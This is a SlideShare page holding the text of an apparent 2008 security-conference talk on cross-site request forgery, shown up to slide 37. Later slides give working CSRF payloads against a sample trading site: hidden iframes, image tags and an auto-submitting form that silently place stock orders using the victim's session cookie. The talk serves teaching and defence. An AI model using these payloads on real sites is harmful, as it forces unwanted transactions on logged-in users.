Enviar búsqueda
Cargar
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
•
12 recomendaciones
•
6,503 vistas
Shreeraj Shah
Seguir
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 86
Recomendados
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
Shreeraj Shah
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Shreeraj Shah
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Shreeraj Shah
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
XSS and CSRF with HTML5
XSS and CSRF with HTML5
Shreeraj Shah
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Shreeraj Shah
Recomendados
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
Shreeraj Shah
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Shreeraj Shah
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Shreeraj Shah
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
XSS and CSRF with HTML5
XSS and CSRF with HTML5
Shreeraj Shah
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Shreeraj Shah
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
Shreeraj Shah
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
guest66dc5f
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
owaspindia
O Dell Secure360 Presentation5 12 10b
O Dell Secure360 Presentation5 12 10b
Bruce O'Dell
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
HAD05: Collaborating with Extranet Partners on SharePoint 2010
HAD05: Collaborating with Extranet Partners on SharePoint 2010
Michael Noel
Blind SQL Injection
Blind SQL Injection
Blueinfy Solutions
Dave Carroll Application Services Salesforce
Dave Carroll Application Services Salesforce
deimos
Mobile Application Scan and Testing
Mobile Application Scan and Testing
Blueinfy Solutions
Building Secure Extranets with Claims-Based Authentication #SPEvo13
Building Secure Extranets with Claims-Based Authentication #SPEvo13
Gus Fraser
Using & Abusing APIs: An Examination of the API Attack Surface
Using & Abusing APIs: An Examination of the API Attack Surface
CA API Management
Silverlight Document Search Engine
Silverlight Document Search Engine
Mustata Bogdan
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
Collaborating with Extranet Partners on SharePoint 2010 - SharePoint Connecti...
Collaborating with Extranet Partners on SharePoint 2010 - SharePoint Connecti...
Michael Noel
Identity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and Shibboleth
Andrew Petro
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
J V
How to deploy SharePoint 2010 to external users?
How to deploy SharePoint 2010 to external users?
rlsoft
RESTful Day 5
RESTful Day 5
Akhil Mittal
SharePoint 2010 Extranets and Authentication: How will SharePoint 2010 connec...
SharePoint 2010 Extranets and Authentication: How will SharePoint 2010 connec...
Brian Culver
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Mark Stanton
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Nilesh Sapariya
Más contenido relacionado
La actualidad más candente
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
Shreeraj Shah
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
guest66dc5f
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
owaspindia
O Dell Secure360 Presentation5 12 10b
O Dell Secure360 Presentation5 12 10b
Bruce O'Dell
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
HAD05: Collaborating with Extranet Partners on SharePoint 2010
HAD05: Collaborating with Extranet Partners on SharePoint 2010
Michael Noel
Blind SQL Injection
Blind SQL Injection
Blueinfy Solutions
Dave Carroll Application Services Salesforce
Dave Carroll Application Services Salesforce
deimos
Mobile Application Scan and Testing
Mobile Application Scan and Testing
Blueinfy Solutions
Building Secure Extranets with Claims-Based Authentication #SPEvo13
Building Secure Extranets with Claims-Based Authentication #SPEvo13
Gus Fraser
Using & Abusing APIs: An Examination of the API Attack Surface
Using & Abusing APIs: An Examination of the API Attack Surface
CA API Management
Silverlight Document Search Engine
Silverlight Document Search Engine
Mustata Bogdan
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
Collaborating with Extranet Partners on SharePoint 2010 - SharePoint Connecti...
Collaborating with Extranet Partners on SharePoint 2010 - SharePoint Connecti...
Michael Noel
Identity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and Shibboleth
Andrew Petro
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
J V
How to deploy SharePoint 2010 to external users?
How to deploy SharePoint 2010 to external users?
rlsoft
RESTful Day 5
RESTful Day 5
Akhil Mittal
SharePoint 2010 Extranets and Authentication: How will SharePoint 2010 connec...
SharePoint 2010 Extranets and Authentication: How will SharePoint 2010 connec...
Brian Culver
La actualidad más candente
(20)
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
O Dell Secure360 Presentation5 12 10b
O Dell Secure360 Presentation5 12 10b
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
HAD05: Collaborating with Extranet Partners on SharePoint 2010
HAD05: Collaborating with Extranet Partners on SharePoint 2010
Blind SQL Injection
Blind SQL Injection
Dave Carroll Application Services Salesforce
Dave Carroll Application Services Salesforce
Mobile Application Scan and Testing
Mobile Application Scan and Testing
Building Secure Extranets with Claims-Based Authentication #SPEvo13
Building Secure Extranets with Claims-Based Authentication #SPEvo13
Using & Abusing APIs: An Examination of the API Attack Surface
Using & Abusing APIs: An Examination of the API Attack Surface
Silverlight Document Search Engine
Silverlight Document Search Engine
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Collaborating with Extranet Partners on SharePoint 2010 - SharePoint Connecti...
Collaborating with Extranet Partners on SharePoint 2010 - SharePoint Connecti...
Identity Management Overview: CAS and Shibboleth
Identity Management Overview: CAS and Shibboleth
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
How to deploy SharePoint 2010 to external users?
How to deploy SharePoint 2010 to external users?
RESTful Day 5
RESTful Day 5
SharePoint 2010 Extranets and Authentication: How will SharePoint 2010 connec...
SharePoint 2010 Extranets and Authentication: How will SharePoint 2010 connec...
Destacado
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Mark Stanton
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Nilesh Sapariya
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
Russ McRee
Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & Defense
Surya Subhash
Understanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
Sql injection
Sql injection
Hemendra Kumar
SQL Injection
SQL Injection
Marios Siganos
Ppt on sql injection
Ppt on sql injection
ashish20012
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
Bernardo Damele A. G.
Sql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
Understanding CSRF
Understanding CSRF
Potato
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting Explained
Valency Networks
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
Destacado
(13)
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & Defense
Understanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Sql injection
Sql injection
SQL Injection
SQL Injection
Ppt on sql injection
Ppt on sql injection
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
Sql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Understanding CSRF
Understanding CSRF
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting Explained
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Similar a [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
SproutCore GTUG
SproutCore GTUG
sproutit
Top Ten Web Attacks
Top Ten Web Attacks
Ajay Ohri
Architecting eCommerce APIs - Gluecon 13
Architecting eCommerce APIs - Gluecon 13
Saranyan Vigraham
Azure Services Platform
Azure Services Platform
David Chou
Best Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network Attack
Amazon Web Services
Building tomorrow's web with today's tools
Building tomorrow's web with today's tools
James Pearce
API Reliability Guide
API Reliability Guide
Nick DeNardis
Patterns of Cloud Applications Using Microsoft Azure Services Platform
Patterns of Cloud Applications Using Microsoft Azure Services Platform
David Chou
Windows Azure Essentials
Windows Azure Essentials
Michele Leroux Bustamante
DEV329_Cisco’s Journey from Monolith to Microservices
DEV329_Cisco’s Journey from Monolith to Microservices
Amazon Web Services
Software as a Service
Software as a Service
Frankie Warren
Iron speed appgeneration
Iron speed appgeneration
ankit.das
How to become a Citrix Performance Hero
How to become a Citrix Performance Hero
eG Innovations
AWS X-Ray: Debugging Applications at Scale - AWS Online Tech Talks
AWS X-Ray: Debugging Applications at Scale - AWS Online Tech Talks
Amazon Web Services
Programatori cu capul in nori
Programatori cu capul in nori
Alex Popescu
SharePoint 2010 Service Apps
SharePoint 2010 Service Apps
Jason Gallicchio
El futuro era esto: Reconocimiento facial sobre video en tiempo real sin serv...
El futuro era esto: Reconocimiento facial sobre video en tiempo real sin serv...
javier ramirez
Microsoft Insurance Solutions Keynote Presentation at the Financial Services ...
Microsoft Insurance Solutions Keynote Presentation at the Financial Services ...
Mike Walker
Hybrid Cloud Networking
Hybrid Cloud Networking
SVForum Cloud SIG
Mykonos Media Presentation
Mykonos Media Presentation
Mykonos Software
Similar a [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
(20)
SproutCore GTUG
SproutCore GTUG
Top Ten Web Attacks
Top Ten Web Attacks
Architecting eCommerce APIs - Gluecon 13
Architecting eCommerce APIs - Gluecon 13
Azure Services Platform
Azure Services Platform
Best Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network Attack
Building tomorrow's web with today's tools
Building tomorrow's web with today's tools
API Reliability Guide
API Reliability Guide
Patterns of Cloud Applications Using Microsoft Azure Services Platform
Patterns of Cloud Applications Using Microsoft Azure Services Platform
Windows Azure Essentials
Windows Azure Essentials
DEV329_Cisco’s Journey from Monolith to Microservices
DEV329_Cisco’s Journey from Monolith to Microservices
Software as a Service
Software as a Service
Iron speed appgeneration
Iron speed appgeneration
How to become a Citrix Performance Hero
How to become a Citrix Performance Hero
AWS X-Ray: Debugging Applications at Scale - AWS Online Tech Talks
AWS X-Ray: Debugging Applications at Scale - AWS Online Tech Talks
Programatori cu capul in nori
Programatori cu capul in nori
SharePoint 2010 Service Apps
SharePoint 2010 Service Apps
El futuro era esto: Reconocimiento facial sobre video en tiempo real sin serv...
El futuro era esto: Reconocimiento facial sobre video en tiempo real sin serv...
Microsoft Insurance Solutions Keynote Presentation at the Financial Services ...
Microsoft Insurance Solutions Keynote Presentation at the Financial Services ...
Hybrid Cloud Networking
Hybrid Cloud Networking
Mykonos Media Presentation
Mykonos Media Presentation
Más de Shreeraj Shah
Html5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
Shreeraj Shah
Secure SDLC for Software
Secure SDLC for Software
Shreeraj Shah
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
Shreeraj Shah
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Shreeraj Shah
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
Shreeraj Shah
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
Shreeraj Shah
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
Shreeraj Shah
Más de Shreeraj Shah
(9)
Html5 localstorage attack vectors
Html5 localstorage attack vectors
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
Secure SDLC for Software
Secure SDLC for Software
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
Último
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
The Digital Insurer
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
HampshireHUG
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
Results
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
hans926745
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
Khem
Slack Application Development 101 Slides
Slack Application Development 101 Slides
praypatel2
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Rafal Los
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
sudhanshuwaghmare1
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Martijn de Jong
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Último
(20)
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
Slack Application Development 101 Slides
Slack Application Development 101 Slides
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
1.
Session J7 Demo CSRF:
The Biggest Little Vulnerability on the Web
2.
Who Am I?
http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – SecurityExposure.com Past experience – Net Square, Chase, IBM & Foundstone Interest – Web security research Published research – Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. – Advisories - .Net, Java servers etc. Books (Author) – Web 2.0 Security – Defending Ajax, RIA and SOA – Hacking Web Services – Web Hacking © Blueinfy Solutions Pvt. Ltd.
3.
Both real and
possible It all can happen while you are browsing without your consent – Bank account transfer – Buy call for stocks – Password changes on your email account – Placing an order on your online auction site – ….more…. © Blueinfy Solutions Pvt. Ltd.
4.
Myth… We have authentication
in place We do proper session management We are over SSL and entertain just POST requests We use secure browser © Blueinfy Solutions Pvt. Ltd.
5.
How? All popular browsers
can make Cross Domain Calls Browsers do replay cookies to same domain Browser manages authentications as well CSRF © Blueinfy Solutions Pvt. Ltd.
6.
Demo Quick look at
the case of Stock trading portal Adding stocks to portfolio ☺ © Blueinfy Solutions Pvt. Ltd.
7.
Agenda State
of Application Security and Role of CSRF CSRF Introduction and Cross Domain Calls CSRF attack CSRF and Web 2.0 Defense against CSRF Conclusion We will have concepts, examples and demos © Blueinfy Solutions Pvt. Ltd.
8.
Application Security State
CSRF on the rise © Blueinfy Solutions Pvt. Ltd.
9.
Hacks & Attacks
© Blueinfy Solutions Pvt. Ltd.
10.
Attack vectors and
types Source: Web Application Security Consortium (WASC) © Blueinfy Solutions Pvt. Ltd.
11.
Trends… Server side hacking
is getting tougher with central defense Attacks on client side – XSS and CSRF Helps in identity stealing Both exploits and framework are available © Blueinfy Solutions Pvt. Ltd.
12.
CSRF – “Sleeping
giant” “Sleeping giant is still a giant” Entered into OWASP top 10 and Mitre Corp.'s Common Vulnerability and Exposures (CVE) list XSS and CSRF can be twin evils Having XSS one gets CSRF free any way CSRF defense is difficult © Blueinfy Solutions Pvt. Ltd.
13.
Real Cases and
Attacks © Blueinfy Solutions Pvt. Ltd.
14.
Web 2.0 –
Adding fuel to the fire 80% of companies are investing in Web Services as part of their Web 2.0 initiative (McKinsey 2007 Global Survey) By the end of 2007, 30 percent of large companies have some kind of Web 2.0-based business initiative up and running. (Gartner) 2008. Web Services or Service- Oriented Architecture (SOA) would surge ahead. (Gartner) © Blueinfy Solutions Pvt. Ltd.
15.
Root cause of
Vulnerabilities CSRF is somewhere in-between CSI Security Survey : Vulnerability Distribution Protocol? Browser? misconfiguration, Programming? other problems 36% programming errors 64% misconfiguration, other problems programming errors © Blueinfy Solutions Pvt. Ltd.
16.
CSRF – Basics
© Blueinfy Solutions Pvt. Ltd.
17.
CSRF Cross Site Request
Forgery (CSRF) also known as XSRF Several other names to same vector like – “sea surf”, session ridding, One click attack etc… Results are same © Blueinfy Solutions Pvt. Ltd.
18.
CSRF scenario
Login request Web app Web app DB Web Web Client Web app Authenticated Server SESSID=190832mkidw DB Session id given Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
19.
CSRF scenario
Transaction page Web app Web app DB Web Web Client Web app Transaction done Server DB SESSID=190832mkidw On session id Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
20.
CSRF scenario
Malicious Site Browse Load a Web app page Web app DB Web Web Client Web app Server SESSID=190832mkidw DB Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
21.
CSRF scenario
Malicious Site Browse Load a page Web app Forced Web app DB Web Web Client Transaction page Web app Server DB SESSID=190832mkidw Transaction done Web app on session id Banking Application © Blueinfy Solutions Pvt. Ltd.
22.
Cross Domain Call Why?
– Cross Domain Calls work What about Same Origin Policy (SOP)? Is it a bypass to it? – For CSRF success. © Blueinfy Solutions Pvt. Ltd.
23.
Cross Domain Access
and Same Origin Policy (SOP) © Blueinfy Solutions Pvt. Ltd.
24.
Cross Domain Browser &
Cross domain access – an issue How to access cross domain information from the browser? Browsers are following same origin policy. This policy protect browser from security and privacy access Ajax and RIA brought this issue on front end It is important for them to access cross domain resources. © Blueinfy Solutions Pvt. Ltd.
25.
Same Origin Policy Same
origin policy is followed by all browsers The policy dates from Netscape Navigator 2.0. Two pages to have the same origin if the protocol, port (if given), and host are the same for both pages. document.domain – DOM reference point © Blueinfy Solutions Pvt. Ltd.
26.
Example http://example.com/dir1/foo.asp http://example.com/dir2/me.asp [Success] https://example.com/cool.asp [Fail- protocol] http://example.com:8080/foo.asp [Fail- port] http://apple.com/
[Fail-host] Origin check is there by comparing with document.domain – Part of DOM © Blueinfy Solutions Pvt. Ltd.
27.
Should not work
trade.example.com Login (user/pass) Trading Site Client Authentication Cookie Trading Page X News Site cnn.com © Blueinfy Solutions Pvt. Ltd.
28.
Request generation IMG SRC
<img src=quot;http://host/?commandquot;> SCRIPT SRC <script src=quot;http://host/?commandquot;> IFRAME SRC <iframe src=quot;http://host/?commandquot;> © Blueinfy Solutions Pvt. Ltd.
29.
Request generation 'Image' Object
<script> var foo = new Image(); foo.src = quot;http://host/?commandquot;; </script> © Blueinfy Solutions Pvt. Ltd.
30.
Request generation
It is possible to generate POST as well Form can be build dynamically and button click from JavaScript is possible <script type=quot;text/javascriptquot; language=quot;JavaScriptquot;> document.foo.submit(); </script> © Blueinfy Solutions Pvt. Ltd.
31.
CSRF Attack
© Blueinfy Solutions Pvt. Ltd.
32.
Attacking with CSRF
© Blueinfy Solutions Pvt. Ltd.
33.
Logging in POST /trade/login.aspx
HTTP/1.1 HTTP/1.x 200 OK Host: trade.example.com Date: Mon, 23 Jul 2007 04:10:29 GMT User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Server: Microsoft-IIS/6.0 Accept: X-Powered-By: ASP.NET text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,tex X-AspNet-Version: 2.0.50727 t/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Set-Cookie: Accept-Encoding: gzip,deflate ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1; Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 path=/; Keep-Alive: 300 Cache-Control: private Connection: keep-alive Content-Type: text/html; charset=utf-8 Referer: http://trade.example.com/trade/login.aspx Content-Type: application/x-www-form-urlencoded Content-Length: 34 user=rob&pass=iamrob&Submit=Submit © Blueinfy Solutions Pvt. Ltd.
34.
Placing an order GET
/trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0. 8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://trade.example.com/trade/trade.html Cookie: ASP.NET_SessionId= mvoik245bzlfom55dxjsxoe1 © Blueinfy Solutions Pvt. Ltd.
35.
Victim on another
site <html> <head></head> <body> Welcome to our auction portal. We have some great products for which you can bid. <br> Enjoy! <iframe src='http://trade.example.com/trade/buy.aspx?symbol=GOOG&units=50‘ id='xsfr' name='CSRF' style=quot;width:0px; height:0px; border: 0pxquot;> </body> </html> GET /trade/buy.aspx?symbol=GOOG&units=50 HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://CSRF.example.com/trade/CSRF.html Cookie: ASP.NET_SessionId=x5r1a355eppt5k454kjmx245 © Blueinfy Solutions Pvt. Ltd.
36.
Victim with POST
request <FORM NAME=quot;buyquot; action=quot;./buy.aspxquot; METHOD=quot;GETquot;> <input type=quot;hiddenquot; name=quot;symbolquot; value=quot;GOOGquot;> <input type=quot;hiddenquot; name=quot;unitsquot; value=quot;50quot;> </FORM> <script>document.buy.submit();</script> POST /trade/buy.aspx HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0 .8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://CSRF.example.com/trade/buy.html Content-Type: application/x-www-form-urlencoded Content-Length: 20 symbol=GOOG&units=50 © Blueinfy Solutions Pvt. Ltd.
37.
Obfuscation to bypass
